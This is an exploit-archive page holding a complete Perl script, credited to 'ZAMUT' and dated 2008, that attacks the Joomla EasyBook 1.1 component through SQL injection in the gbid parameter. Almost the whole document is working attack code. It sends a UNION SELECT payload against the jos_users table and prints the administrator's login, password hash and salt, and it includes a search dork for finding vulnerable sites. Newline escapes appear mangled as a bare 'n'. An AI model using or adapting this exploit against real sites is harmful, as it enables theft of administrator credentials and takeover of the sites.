Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit
# Published : 2008-06-04
# Author : ZAMUT
# Previous Title : plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability
# Next Title : FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability

#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:                             #
# Host: xxx.lu  	               #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-n";
print "-+--                                                      --+-n";
print "-+--            Author: ZAMUT                             --+-n";
print "-+--            Vuln: gbid=                               --+-n";
print "-+--            Homepage: http://antichat.ru              --+-n";
print "-+--            Dork: com_easybook                        --+-nn";

print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0n".
               "Host: www.$hostn".
			   "Content-Type: application/x-www-form-urlencodedn".
			   "Content-Length: 214nn".
               "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$mdn";
  while(<$socket>)
  {
	 $s = <$socket>;
	 if($s=~/:::(.+):::/){
		   $lhs = $1;
	       ($l,$h,$s)=split(':',$lhs);
		   print "nAdmin Login:$lnHash:$hnSalt:$sn";
		   close $socket; 
		   exit; }
  }
  die ("Exploit failed!");

# www.Syue.com [2008-06-04]